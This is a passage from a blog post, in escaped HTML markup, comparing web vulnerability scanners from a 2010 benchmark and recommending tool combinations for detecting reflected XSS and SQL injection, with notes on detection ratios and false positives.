the day the benchmark was released (see the full explanation at the end of the post).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;AND&lt;/b&gt; – combining the tools is required to obtain the best results.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;OR&lt;/b&gt; – using either one of the tools will provide nearly identical results.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;AND/OR&lt;/b&gt; – it is currently unknown if combining them will provide additional benefits.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;SAFE scan&lt;/b&gt; – a scan method in which the tester can select which URLs to scan, in order to prevent the scanner from accessing links that could &lt;b&gt;delete&lt;/b&gt; data&lt;b&gt;, lock user accounts&lt;/b&gt; or cause any other unintentional hazard (generally requires the scanner to have a proxy/manual crawling/URL file parsing/pre-configured URL restriction module); Recommended while scanning the internal section of an application that resides in a production environment.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;UNSAFE scan&lt;/b&gt; – a scan method that scans all the URLs, without any restrictions or limitations; Recommended while scanning the public section of an application, and for scanning the internal section of an application that resides in the testing/development environment.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;The Ideal Combination of Tools (Relevant to the release date of the initial benchmark – 26/12/2010):&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;(Constructed according to the cases detected by each tool, and according to tool capabilities and application scope restrictions)&lt;/p&gt;  &lt;table class=&quot;MsoTableGrid&quot; border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; style=&quot;border-collapse:collapse;border:none;mso-border-alt:solid windowtext .5pt;  mso-yfti-tbllook:1184;mso-padding-alt:0in 5.4pt 0in 5.4pt&quot;&gt;  &lt;tbody&gt;&lt;tr style=&quot;mso-yfti-irow:0;mso-yfti-firstrow:yes&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   mso-border-alt:solid windowtext .5pt;background:#CCC0D9;mso-background-themecolor:   accent4;mso-background-themetint:102;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;&lt;u&gt;Scan Type &amp;amp; Target &lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-left:none;mso-border-left-alt:solid windowtext .5pt;mso-border-alt:   solid windowtext .5pt;background:#CCC0D9;mso-background-themecolor:accent4;   mso-background-themetint:102;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;&lt;u&gt;Reflected XSS&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-left:none;mso-border-left-alt:solid windowtext .5pt;mso-border-alt:   solid windowtext .5pt;background:#CCC0D9;mso-background-themecolor:accent4;   mso-background-themetint:102;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;&lt;u&gt;SQL Injection (MySQL)&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:1&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;Initial Public Scan&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Initial Scan on the Application’s Public (unauthenticated) Section &lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(&lt;b&gt;Purpose:&lt;/b&gt; &lt;b&gt;gather as many “Low Hanging Fruit” exposures as possible   with a minimal amount of false positives&lt;/b&gt;)&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;Netsparker&lt;/b&gt; AND &lt;b&gt;Acunetix&lt;/b&gt; AND &lt;b&gt;N-Stalker&lt;/b&gt; AND &lt;b&gt;SkipFish&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(Nearly False Positive Free Combination)&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;ProxyStrike &lt;/b&gt;AND &lt;b&gt;WebCruiser&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(Nearly False Positive Free Combination)&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:2&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;Internal Scan - Unsafe&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;The Application’s Internal (authenticated) Section &lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;Netsparker&lt;/b&gt; AND &lt;b&gt;Acunetix&lt;/b&gt; AND &lt;b&gt;SkipFish&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(Nearly False Positive Free Combination)&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;Wapiti&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(Verification with other tools is recommended to reduce False Positives – &lt;b&gt;ProxyStrike &lt;/b&gt;AND &lt;b&gt;WebCruiser, &lt;/b&gt;In addition to one of the   following: W3AF/Andipaors/ZAP/ &lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Netsparker/Sandcat/&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Oedipus)&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:3&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;Internal Scan - Safe&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;The Application’s Internal (authenticated) Section&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(&lt;b&gt;Method: scan internal application pages without activating any   delete, logout or other dangerous operations&lt;/b&gt;).&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;ZAP&lt;/b&gt; AND &lt;b&gt;W3AF&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(Safe combination with relatively efficient accuracy)&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;W3AF &lt;/b&gt;AND &lt;b&gt;Andiparos&lt;/b&gt;/&lt;b&gt;Paros&lt;/b&gt; AND&lt;b&gt; Oedipus &lt;/b&gt;AND&lt;b&gt;   ProxyStrike&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:4&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;Additional Public Scan&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Detect additional potential exposures that&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;require manual verification, and aren’t   covered by previous tools &lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(Public Section)&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;ProxyStrike&lt;/b&gt; OR &lt;b&gt;Sandcat (Grabber &lt;/b&gt;detects 1-2 additional   POST cases - optional&lt;b&gt;)&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;Wapiti&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:5&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;2nd Internal – Unsafe&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Detect additional potential exposures that&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;require manual verification, and aren’t   covered by previous tools &lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;ProxyStrike&lt;/b&gt; OR &lt;b&gt;Sandcat&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;Wapiti&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;(No substantial change, so there’s no need to run another scan)&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:6&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;2nd Internal – Safe&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Detect additional potential exposures that&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;require manual verification, and aren’t   covered by previous tools&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;(&lt;b&gt;Method: scan internal application pages for additional exposure   instances without activating any delete, logout or other dangerous operations&lt;/b&gt;)&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;ProxyStrike&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border-top:none;border-left:   none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;W3AF &lt;/b&gt;AND &lt;b&gt;Andiparos&lt;/b&gt;/&lt;b&gt;Paros&lt;/b&gt; AND&lt;b&gt; Oedipus &lt;/b&gt;AND&lt;b&gt;   ProxyStrike&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;(No substantial change, so there’s no need to run another scan)&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:7&quot;&gt;   &lt;td width=&quot;479&quot; colspan=&quot;3&quot; valign=&quot;top&quot; style=&quot;width:359.1pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   background:#CCC0D9;mso-background-themecolor:accent4;mso-background-themetint:   102;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; align=&quot;center&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;   text-align:center;line-height:normal;tab-stops:297.75pt&quot;&gt;&lt;b&gt;&lt;u&gt;Complementary   Scan for Additional Exposures&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=&quot;mso-yfti-irow:8;mso-yfti-lastrow:yes&quot;&gt;   &lt;td width=&quot;160&quot; valign=&quot;top&quot; style=&quot;width:119.7pt;border:solid windowtext 1.0pt;   border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;   padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;u&gt;Complementary Scan&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;Scan the applications with scanners that have a wider range of   features, to cover additional security flaws&lt;/p&gt;   &lt;/td&gt;   &lt;td width=&quot;319&quot; colspan=&quot;2&quot; valign=&quot;top&quot; style=&quot;width:239.4pt;border-top:none;   border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;   mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;   mso-border-alt:solid windowtext .5pt;padding:0in 5.4pt 0in 5.4pt&quot;&gt;   &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom:0in;margin-bottom:.0001pt;line-height:   normal&quot;&gt;&lt;b&gt;W3AF&lt;/b&gt; AND/OR &lt;b&gt;Arachni&lt;/b&gt; AND/OR &lt;b&gt;Skipfish&lt;/b&gt; AND/OR &lt;b&gt;Sandcat&lt;/b&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Notable Open Source &amp;amp; Freeware Tools – SQL Injection Detection&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The highest SQLi detection ratio of open source &amp;amp; freeware tools belongs to &lt;b&gt;Wapiti&lt;/b&gt;, currently the undisputed winner in this category.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;A bit behind &lt;b&gt;Wapiti&lt;/b&gt; were &lt;b&gt;AndiParos&lt;/b&gt;, &lt;b&gt;Zapproxy&lt;/b&gt; and &lt;b&gt;Paros Proxy&lt;/b&gt; (all forks of the original Paros project), followed closely by &lt;b&gt;Netsparker&lt;/b&gt; and &lt;b&gt;W3AF (&lt;/b&gt;two tools that were prone to &lt;b&gt;less&lt;/b&gt; false positives test cases, compared&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;to all of the tools described so far - 30% compared to 40% or 50%).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size:10.0pt;line-height:115%&quot;&gt;* it is important to mention that Netsparker CE 1.5 does &lt;b&gt;&lt;u&gt;not&lt;/u&gt;&lt;/b&gt; contain Netsparker’s Blind-SQL injection module (disabled in this version), only the regular SQL-Injection module and the Boolean SQL-Injection module.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;However, we cannot ignore the fact that the following tools had pretty decent accuracy &lt;b&gt;with 0 false positives(!): &lt;/b&gt;WebCruiser (55.88%) and ProxyStrike (52.21%), making them &lt;b&gt;ideal&lt;/b&gt; tools for &lt;b&gt;an&lt;/b&gt; &lt;b&gt;initial scan &lt;/b&gt;(&lt;b&gt;Mini MySqlat0r&lt;/b&gt; and &lt;b&gt;Scrawler&lt;/b&gt; had 0 false positives as well, but with lower accuracy).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Notable Open Source &amp;amp; Freeware Tools – XSS Detection&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The Highest XSS detection ratio belongs to &lt;b&gt;Sandcat&lt;/b&gt;, which detected nearly 100% of the overall test-cases (although like ProxyStrike &amp;amp; Grabber, it was misled by a few extra false positive test cases).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The highest XSS detection ratio of open source tools (and 2nd best in total) belongs to &lt;b&gt;ProxyStrike &lt;/b&gt;(&lt;b&gt;Grabber &lt;/b&gt;detected&lt;b&gt; &lt;/b&gt;more POST test cases, but had a higher false positive ratio, and did not detect GET cases).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The best overall XSS detection ratio (while considering the low amount of false positives) belongs to &lt;b&gt;Netsparker CE &lt;/b&gt;(&lt;span style=&quot;font-size:9.0pt;line-height:115%;font-family:TTE4A0A428t00;mso-ascii-font-family: TTE4A0A428t00&quot;&gt;63.64% and 3rd in the efficiency order, right after ProxyStrike)&lt;/span&gt;, followed closely by &lt;b&gt;N-Stalker&lt;/b&gt; and by &lt;b&gt;Acunetix&lt;/b&gt; &lt;b&gt;FE (&lt;/b&gt;and since &lt;b&gt;Skipfish&lt;/b&gt; and these tools “complete” missing test cases in each other, they are &lt;b&gt;ideal&lt;/b&gt; for initial scans, since they all have &lt;b&gt;0 false positives!&lt;/b&gt;).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The best overall XSS detection ratio (while considering the low amount of false positives) of open source tools belongs to &lt;b&gt;WebSecurify&lt;/b&gt;.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The best HTTP GET XSS detection ratio (while considering the low amount of false positives) of open source tools belongs to &lt;b&gt;XSSer&lt;/b&gt;.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;The following open source tools had XSS detection modules that were free of false positives (while still having a relatively efficient detection ratio) – &lt;b&gt;Grendel-Scan (GET)&lt;/b&gt; and &lt;b&gt;Skipfish&lt;/b&gt; (&lt;b&gt;Secubat&lt;/b&gt; had 0 false positives as well, but its detection ratio was a bit lower).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Notes&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;When using ProxyStrike for the initial scan, It’s probably best to use an &lt;b&gt;external&lt;/b&gt; spider instead of the built in spider (e.g. use ProxyStrike as an outgoing/upstream proxy for Burp Suite FE or Paros/ZAP/Andiparos and then use the spider feature of the external tool through ProxyStrike).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;As mentioned before, the conclusions reflect the condition of the various tools in the date the initial benchmark was published. Since the benchmark, many vendors had released new versions (some even in response to the benchmark), so the list of 